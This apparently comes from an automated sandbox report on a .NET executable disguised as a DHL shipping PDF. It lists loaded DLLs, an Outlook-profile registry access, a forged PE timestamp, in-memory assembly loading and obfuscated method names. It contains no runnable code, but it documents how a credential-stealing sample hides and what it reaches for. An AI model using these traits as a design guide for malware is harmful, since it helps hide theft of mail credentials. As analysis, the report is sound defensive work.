                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: NKUn.pdb source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: Binary string: NKUn.pdbSHA2569x source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

                  Data Obfuscation

                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.2c9f698.1.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.55c0000.6.raw.unpack, .cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.cs | .Net Code: X6gCnMyEEf System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.cs | .Net Code: X6gCnMyEEf System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.cs | .Net Code: X6gCnMyEEf System.Reflection.Assembly.Load(byte[])
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: 0xBAE167AD [Thu May 9 14:11:57 2069 UTC]
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Code function: 0_2_0714A34A push eax; ret 0_2_0714A34D
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Code function: 0_2_07141CEE push ds; retf 0_2_07141CEF
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Static PE information: section name: .text entropy: 7.711256554162364
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, MfBcmtyiiOcv45FyA6.csHigh entropy of concatenated method names: 'zNnucbZK9M', 'BeCumytkiQ', 'HrIuuHoGSh', 'XRRuLGTjF0', 'Wrdu97fluU', 'P36uHtly4o', 'Dispose', 'HAps4ibK2S', 'HVasd7VHRE', 'rCksij7bdl'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, xNZtbo8jW3j16KHc9B.csHigh entropy of concatenated method names: 'dbKSiHv0Pp', 'dO8SRWYBaa', 'm3ESa5jjHx', 'b02SX7VEtg', 'lROSujTmA5', 'xqtSTVGddt', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, deToFC7XTWvUtFM6S9.csHigh entropy of concatenated method names: 'ToString', 'v55kN7wBHn', 'xybkx9XSJp', 'wOKkhDUiCO', 'Yrwk1gjQgj', 'O7MkeQDZ2y', 'R2Lk65F8Ry', 'QF8k08hQm7', 'slxkPnOga4', 'sFQkjNOeRj'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, Pwd2CcULBNau6IqyCn.csHigh entropy of concatenated method names: 'hbqcJJkrCy', 'eINc2abhid', 'DT0cUVkIvm', 'TebcMjnAtT', 'EDhcxoxS9l', 'wwZchmmw95', 'QqUc16Pack', 'eO0ces1xIM', 'oBXc6etImu', 'YEJc0a3bx0'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, BqQxfQzLLQbFtPRW3J.csHigh entropy of concatenated method names: 'HiMSfbaJWY', 'UZgSYLHFiS', 'dOgSD9YEWk', 'fiPStMKa2h', 'uMdSxhuhvH', 'zn8S1o6wK1', 'XJrSeJxbXt', 'h1kSHKidTj', 'VNVSG0RGt1', 'BAlSFM6MyH'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, I7MtYtpPZaFAheexDu.csHigh entropy of concatenated method names: 'XPAnY10wV', 'RAUwK3wxX', 'jCRfkcyS2', 'of9Q8SLlg', 'J7dD2hgoc', 'pgmEZN5DI', 'fCc5SV3IDrSUcndWMe', 'FEhI6JrqGTkxZyNDwW', 'o5csSYsRa', 'S8MSDgxYc'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, dRkct4CeFnMgMmS3ds.csHigh entropy of concatenated method names: 'TiR5XZZiMm', 'GgN5TbupTa', 'l1F5rrJSFk', 'cax5K41uki', 'mCs5c8aFiG', 'I8Q5kkgBG0', 'tXodXri4e3Pss4Tgc0', 'zv7lhwaoETO3SJ1wGJ', 'CVD3MTlb6RZ9W6erQE', 'wV3557vWaP'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, iZZiMmYtgNbupTaoiP.csHigh entropy of concatenated method names: 'W7PdUlLGPM', 'KQcdMhvy8v', 'q7yd7OeGl6', 'Sa7dZiWSgJ', 'PP7dWHpbZB', 'QNtdqcj5Os', 'WtfdyIuwae', 'kOydoBgQii', 'elhdBE2tJl', 'ONCd86Ixv3'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, ErUi7lD1FrJSFkpax4.csHigh entropy of concatenated method names: 'UeIiwtuIyM', 'jwiifH8AFc', 'GP5iYvmYMZ', 'QeRiDBUgLI', 'lZZic6DkXR', 'up9ikVsMPg', 'KuDim7tHdW', 'zB9isjL9Mo', 'Tc7iuoSaYe', 'WTZiSh4CaK'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, awiqG603sLp4n4D4Pi.csHigh entropy of concatenated method names: 'N31X4gDs4M', 'bh6Xi9goVO', 'NuBXalSu3I', 'Kfna8FIG3P', 'B0iazrEgCu', 'htfXbiS8mJ', 'FxLX51rNQT', 'qq9XpMclrN', 'NmdXVi7D9S', 'M4gXCgP6hW'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, fIE1H5BiCREqRqSkOl.csHigh entropy of concatenated method names: 'aAiutRbCK4', 'oC2uxFIrSD', 'myJuh3kglP', 'tk6u11c8Nd', 'A6sueL7kSN', 'JNUu6TjHZV', 'vTMu0gU4Sd', 'KFUuPU4ayK', 'aTWujw5S8f', 'LR5uJNag6t'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, LQxvD75CeVNpyj0oPCK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aYJ3u0m8gj', 'aUT3S76k24', 'CwQ3LuP546', 'z9i33GGlli', 'xgw39BUdgW', 'XaE3vDRD7p', 'JgC3HkXNiU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, yiG18QtkgBG0q72fMG.csHigh entropy of concatenated method names: 'xrIaOqC6qj', 'RECadPc6uQ', 'KQyaR0KVG4', 'qqFaXEeVy9', 'KARaT9eRwN', 'e9ERWoEQnU', 'JBRRquaeAj', 'wvFRyWGtno', 'NefRoINMhT', 'kllRBoP378'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, MuxZ4DZLQy9qJCXI4U.csHigh entropy of concatenated method names: 'T5SmrXVfSB', 'AMrmKQSFtk', 'ToString', 'IXHm4DdOdY', 'jGYmdLDfFD', 'fBfmiWEUPX', 'v3nmRv0T0c', 'iJXmaQUKyh', 'kGomXxxKXW', 'tOsmTtyWoF'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, nk1RHsjxXGk2crEfVF.csHigh entropy of concatenated method names: 'EsKXGPyr6m', 'fdUXF2CAUx', 'Y5hXnNpjVK', 'dQlXwH7TtP', 'Td4XgwpCRE', 'TZHXfVdg2x', 'xepXQZHbcG', 'Q4gXY6b6cD', 'bUiXDtX1ir', 'gqvXElWeOQ'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, IukijGEZYdQjGrCs8a.csHigh entropy of concatenated method names: 'unWRgWvK5S', 'UErRQV91GE', 'tVfihCDovu', 'cWFi1oE44J', 'eM3ie0f3t5', 'qoCi6TpxWB', 'yiai0hP8VA', 'WPpiPPNBl3', 'CkCijUXMu2', 'CJqiJtLvpU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, jyMCAX5bjsK0ZXc3xrI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CMVSNdTnH9', 'toJS2I4Gx2', 'y1WSIk5Kx7', 'jxaSUwWFEX', 'FYZSM7cCwZ', 'jQYS72RMxp', 'WrHSZLHkZB'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.csHigh entropy of concatenated method names: 'NQTVORTIqk', 'hlPV41o3Hv', 'RQ6VdPgZbO', 'bJ0VidnE9I', 'hnrVR7iCnL', 'RppVaQLIZb', 'XVTVXtd8Ly', 'wKMVTjvUMt', 'sdAVlQ2yR3', 'whHVrZOFnV'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, xnApCVIMjrAdI14lEe.csHigh entropy of concatenated method names: 'LuOAYNVVHs', 'xlxADBl0J6', 'OL0AtQ7EN0', 'TLOAxttZHN', 'oBhA14XYjv', 'KsVAeMjED8', 'cL6A0H2A5U', 'w1uAP4U135', 'CxGAJjB2RQ', 'OhdAN7y352'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, eVQ1hw554PPm3rQXRCb.csHigh entropy of concatenated method names: 'h85S8Xvo3Y', 'UoMSz2136K', 'P0nLbbdiTj', 'hmkL5eQgcf', 'MruLp8CpCm', 'AN7LVupXLR', 'sohLCKn59q', 'vAjLOGuoWN', 'Y46L4Y3qHT', 'XnTLdH4msA'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, RMxiovdXSF96pWK4ss.csHigh entropy of concatenated method names: 'Dispose', 'fcv5B45FyA', 'BJwpxEWrFX', 'Feo4tAAH3f', 'K0o58JZ1Z8', 'MeX5zjNqDU', 'ProcessDialogKey', 'oPdpbIE1H5', 'gCRp5EqRqS', 'pOlppGNZtb'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, MfBcmtyiiOcv45FyA6.csHigh entropy of concatenated method names: 'zNnucbZK9M', 'BeCumytkiQ', 'HrIuuHoGSh', 'XRRuLGTjF0', 'Wrdu97fluU', 'P36uHtly4o', 'Dispose', 'HAps4ibK2S', 'HVasd7VHRE', 'rCksij7bdl'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, xNZtbo8jW3j16KHc9B.csHigh entropy of concatenated method names: 'dbKSiHv0Pp', 'dO8SRWYBaa', 'm3ESa5jjHx', 'b02SX7VEtg', 'lROSujTmA5', 'xqtSTVGddt', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, deToFC7XTWvUtFM6S9.csHigh entropy of concatenated method names: 'ToString', 'v55kN7wBHn', 'xybkx9XSJp', 'wOKkhDUiCO', 'Yrwk1gjQgj', 'O7MkeQDZ2y', 'R2Lk65F8Ry', 'QF8k08hQm7', 'slxkPnOga4', 'sFQkjNOeRj'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, Pwd2CcULBNau6IqyCn.csHigh entropy of concatenated method names: 'hbqcJJkrCy', 'eINc2abhid', 'DT0cUVkIvm', 'TebcMjnAtT', 'EDhcxoxS9l', 'wwZchmmw95', 'QqUc16Pack', 'eO0ces1xIM', 'oBXc6etImu', 'YEJc0a3bx0'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, BqQxfQzLLQbFtPRW3J.csHigh entropy of concatenated method names: 'HiMSfbaJWY', 'UZgSYLHFiS', 'dOgSD9YEWk', 'fiPStMKa2h', 'uMdSxhuhvH', 'zn8S1o6wK1', 'XJrSeJxbXt', 'h1kSHKidTj', 'VNVSG0RGt1', 'BAlSFM6MyH'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, I7MtYtpPZaFAheexDu.csHigh entropy of concatenated method names: 'XPAnY10wV', 'RAUwK3wxX', 'jCRfkcyS2', 'of9Q8SLlg', 'J7dD2hgoc', 'pgmEZN5DI', 'fCc5SV3IDrSUcndWMe', 'FEhI6JrqGTkxZyNDwW', 'o5csSYsRa', 'S8MSDgxYc'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, dRkct4CeFnMgMmS3ds.csHigh entropy of concatenated method names: 'TiR5XZZiMm', 'GgN5TbupTa', 'l1F5rrJSFk', 'cax5K41uki', 'mCs5c8aFiG', 'I8Q5kkgBG0', 'tXodXri4e3Pss4Tgc0', 'zv7lhwaoETO3SJ1wGJ', 'CVD3MTlb6RZ9W6erQE', 'wV3557vWaP'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, iZZiMmYtgNbupTaoiP.csHigh entropy of concatenated method names: 'W7PdUlLGPM', 'KQcdMhvy8v', 'q7yd7OeGl6', 'Sa7dZiWSgJ', 'PP7dWHpbZB', 'QNtdqcj5Os', 'WtfdyIuwae', 'kOydoBgQii', 'elhdBE2tJl', 'ONCd86Ixv3'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, ErUi7lD1FrJSFkpax4.csHigh entropy of concatenated method names: 'UeIiwtuIyM', 'jwiifH8AFc', 'GP5iYvmYMZ', 'QeRiDBUgLI', 'lZZic6DkXR', 'up9ikVsMPg', 'KuDim7tHdW', 'zB9isjL9Mo', 'Tc7iuoSaYe', 'WTZiSh4CaK'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, awiqG603sLp4n4D4Pi.csHigh entropy of concatenated method names: 'N31X4gDs4M', 'bh6Xi9goVO', 'NuBXalSu3I', 'Kfna8FIG3P', 'B0iazrEgCu', 'htfXbiS8mJ', 'FxLX51rNQT', 'qq9XpMclrN', 'NmdXVi7D9S', 'M4gXCgP6hW'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, fIE1H5BiCREqRqSkOl.csHigh entropy of concatenated method names: 'aAiutRbCK4', 'oC2uxFIrSD', 'myJuh3kglP', 'tk6u11c8Nd', 'A6sueL7kSN', 'JNUu6TjHZV', 'vTMu0gU4Sd', 'KFUuPU4ayK', 'aTWujw5S8f', 'LR5uJNag6t'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, LQxvD75CeVNpyj0oPCK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aYJ3u0m8gj', 'aUT3S76k24', 'CwQ3LuP546', 'z9i33GGlli', 'xgw39BUdgW', 'XaE3vDRD7p', 'JgC3HkXNiU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, yiG18QtkgBG0q72fMG.csHigh entropy of concatenated method names: 'xrIaOqC6qj', 'RECadPc6uQ', 'KQyaR0KVG4', 'qqFaXEeVy9', 'KARaT9eRwN', 'e9ERWoEQnU', 'JBRRquaeAj', 'wvFRyWGtno', 'NefRoINMhT', 'kllRBoP378'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, MuxZ4DZLQy9qJCXI4U.csHigh entropy of concatenated method names: 'T5SmrXVfSB', 'AMrmKQSFtk', 'ToString', 'IXHm4DdOdY', 'jGYmdLDfFD', 'fBfmiWEUPX', 'v3nmRv0T0c', 'iJXmaQUKyh', 'kGomXxxKXW', 'tOsmTtyWoF'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, nk1RHsjxXGk2crEfVF.csHigh entropy of concatenated method names: 'EsKXGPyr6m', 'fdUXF2CAUx', 'Y5hXnNpjVK', 'dQlXwH7TtP', 'Td4XgwpCRE', 'TZHXfVdg2x', 'xepXQZHbcG', 'Q4gXY6b6cD', 'bUiXDtX1ir', 'gqvXElWeOQ'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, IukijGEZYdQjGrCs8a.csHigh entropy of concatenated method names: 'unWRgWvK5S', 'UErRQV91GE', 'tVfihCDovu', 'cWFi1oE44J', 'eM3ie0f3t5', 'qoCi6TpxWB', 'yiai0hP8VA', 'WPpiPPNBl3', 'CkCijUXMu2', 'CJqiJtLvpU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, jyMCAX5bjsK0ZXc3xrI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CMVSNdTnH9', 'toJS2I4Gx2', 'y1WSIk5Kx7', 'jxaSUwWFEX', 'FYZSM7cCwZ', 'jQYS72RMxp', 'WrHSZLHkZB'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.csHigh entropy of concatenated method names: 'NQTVORTIqk', 'hlPV41o3Hv', 'RQ6VdPgZbO', 'bJ0VidnE9I', 'hnrVR7iCnL', 'RppVaQLIZb', 'XVTVXtd8Ly', 'wKMVTjvUMt', 'sdAVlQ2yR3', 'whHVrZOFnV'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, xnApCVIMjrAdI14lEe.csHigh entropy of concatenated method names: 'LuOAYNVVHs', 'xlxADBl0J6', 'OL0AtQ7EN0', 'TLOAxttZHN', 'oBhA14XYjv', 'KsVAeMjED8', 'cL6A0H2A5U', 'w1uAP4U135', 'CxGAJjB2RQ', 'OhdAN7y352'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, eVQ1hw554PPm3rQXRCb.csHigh entropy of concatenated method names: 'h85S8Xvo3Y', 'UoMSz2136K', 'P0nLbbdiTj', 'hmkL5eQgcf', 'MruLp8CpCm', 'AN7LVupXLR', 'sohLCKn59q', 'vAjLOGuoWN', 'Y46L4Y3qHT', 'XnTLdH4msA'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, RMxiovdXSF96pWK4ss.csHigh entropy of concatenated method names: 'Dispose', 'fcv5B45FyA', 'BJwpxEWrFX', 'Feo4tAAH3f', 'K0o58JZ1Z8', 'MeX5zjNqDU', 'ProcessDialogKey', 'oPdpbIE1H5', 'gCRp5EqRqS', 'pOlppGNZtb'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, MfBcmtyiiOcv45FyA6.csHigh entropy of concatenated method names: 'zNnucbZK9M', 'BeCumytkiQ', 'HrIuuHoGSh', 'XRRuLGTjF0', 'Wrdu97fluU', 'P36uHtly4o', 'Dispose', 'HAps4ibK2S', 'HVasd7VHRE', 'rCksij7bdl'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, xNZtbo8jW3j16KHc9B.csHigh entropy of concatenated method names: 'dbKSiHv0Pp', 'dO8SRWYBaa', 'm3ESa5jjHx', 'b02SX7VEtg', 'lROSujTmA5', 'xqtSTVGddt', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, deToFC7XTWvUtFM6S9.csHigh entropy of concatenated method names: 'ToString', 'v55kN7wBHn', 'xybkx9XSJp', 'wOKkhDUiCO', 'Yrwk1gjQgj', 'O7MkeQDZ2y', 'R2Lk65F8Ry', 'QF8k08hQm7', 'slxkPnOga4', 'sFQkjNOeRj'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, Pwd2CcULBNau6IqyCn.csHigh entropy of concatenated method names: 'hbqcJJkrCy', 'eINc2abhid', 'DT0cUVkIvm', 'TebcMjnAtT', 'EDhcxoxS9l', 'wwZchmmw95', 'QqUc16Pack', 'eO0ces1xIM', 'oBXc6etImu', 'YEJc0a3bx0'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, BqQxfQzLLQbFtPRW3J.csHigh entropy of concatenated method names: 'HiMSfbaJWY', 'UZgSYLHFiS', 'dOgSD9YEWk', 'fiPStMKa2h', 'uMdSxhuhvH', 'zn8S1o6wK1', 'XJrSeJxbXt', 'h1kSHKidTj', 'VNVSG0RGt1', 'BAlSFM6MyH'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, I7MtYtpPZaFAheexDu.csHigh entropy of concatenated method names: 'XPAnY10wV', 'RAUwK3wxX', 'jCRfkcyS2', 'of9Q8SLlg', 'J7dD2hgoc', 'pgmEZN5DI', 'fCc5SV3IDrSUcndWMe', 'FEhI6JrqGTkxZyNDwW', 'o5csSYsRa', 'S8MSDgxYc'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, dRkct4CeFnMgMmS3ds.csHigh entropy of concatenated method names: 'TiR5XZZiMm', 'GgN5TbupTa', 'l1F5rrJSFk', 'cax5K41uki', 'mCs5c8aFiG', 'I8Q5kkgBG0', 'tXodXri4e3Pss4Tgc0', 'zv7lhwaoETO3SJ1wGJ', 'CVD3MTlb6RZ9W6erQE', 'wV3557vWaP'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, iZZiMmYtgNbupTaoiP.csHigh entropy of concatenated method names: 'W7PdUlLGPM', 'KQcdMhvy8v', 'q7yd7OeGl6', 'Sa7dZiWSgJ', 'PP7dWHpbZB', 'QNtdqcj5Os', 'WtfdyIuwae', 'kOydoBgQii', 'elhdBE2tJl', 'ONCd86Ixv3'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, ErUi7lD1FrJSFkpax4.csHigh entropy of concatenated method names: 'UeIiwtuIyM', 'jwiifH8AFc', 'GP5iYvmYMZ', 'QeRiDBUgLI', 'lZZic6DkXR', 'up9ikVsMPg', 'KuDim7tHdW', 'zB9isjL9Mo', 'Tc7iuoSaYe', 'WTZiSh4CaK'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, awiqG603sLp4n4D4Pi.csHigh entropy of concatenated method names: 'N31X4gDs4M', 'bh6Xi9goVO', 'NuBXalSu3I', 'Kfna8FIG3P', 'B0iazrEgCu', 'htfXbiS8mJ', 'FxLX51rNQT', 'qq9XpMclrN', 'NmdXVi7D9S', 'M4gXCgP6hW'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, fIE1H5BiCREqRqSkOl.csHigh entropy of concatenated method names: 'aAiutRbCK4', 'oC2uxFIrSD', 'myJuh3kglP', 'tk6u11c8Nd', 'A6sueL7kSN', 'JNUu6TjHZV', 'vTMu0gU4Sd', 'KFUuPU4ayK', 'aTWujw5S8f', 'LR5uJNag6t'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, LQxvD75CeVNpyj0oPCK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aYJ3u0m8gj', 'aUT3S76k24', 'CwQ3LuP546', 'z9i33GGlli', 'xgw39BUdgW', 'XaE3vDRD7p', 'JgC3HkXNiU'
